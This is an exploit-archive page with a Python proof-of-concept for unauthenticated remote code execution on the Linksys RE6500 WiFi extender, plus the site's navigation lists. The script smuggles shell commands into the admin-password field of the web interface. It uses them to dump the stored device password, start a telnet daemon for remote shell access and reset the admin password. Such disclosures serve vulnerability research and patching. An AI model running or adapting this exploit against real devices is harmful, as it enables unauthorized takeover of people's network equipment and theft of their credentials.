Linksys RE6500 1.0.11.001 Remote Code Execution

Linksys RE6500 1.0.11.001 Remote Code Execution: Posted Dec 17, 2020; Authored by RE-Solver; Linksys RE6500 version 1.0.11.001 unauthenticated remote code execution exploit.; tags | exploit, remote, code execution; SHA-256 | 9efc9ac468518ee2905498668bcc7c0449034c86f3cda495c0476099603232f6; Download | Favorite | View

Linksys RE6500 1.0.11.001 Remote Code Execution

# Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE
# Date: 31/07/2020
# Exploit Author: RE-Solver
# Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4
# Vendor Homepage: www.linksys.com
# Version:  FW V1.05 up to FW v1.0.11.001
# Tested on: FW V1.05 up to FW v1.0.11.001
# Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE
# Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution. 
# An attacker can access system OS configurations and commands that are not intended for use beyond the web UI. 

#!/usr/bin/env python

from requests import Session
import requests
import os
print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.")
print("Tested on FW V1.05 up to FW v1.0.11.001")
print("RE-Solver @solver_re")
ip="192.168.1.226"

command="nvram_get Password >/tmp/lastpwd"
#save device password;
post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})

r= s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Prev password saved in /tmp/lastpwd")

command="busybox telnetd"
#start telnetd;
post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})

r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Telnet Enabled")

#set admin password
post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Prevent corrupting nvram - set a new password= admin")

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Linksys RE6500 1.0.11.001 Remote Code Execution

Linksys RE6500 1.0.11.001 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Linksys RE6500 1.0.11.001 Remote Code Execution

Share This

Linksys RE6500 1.0.11.001 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems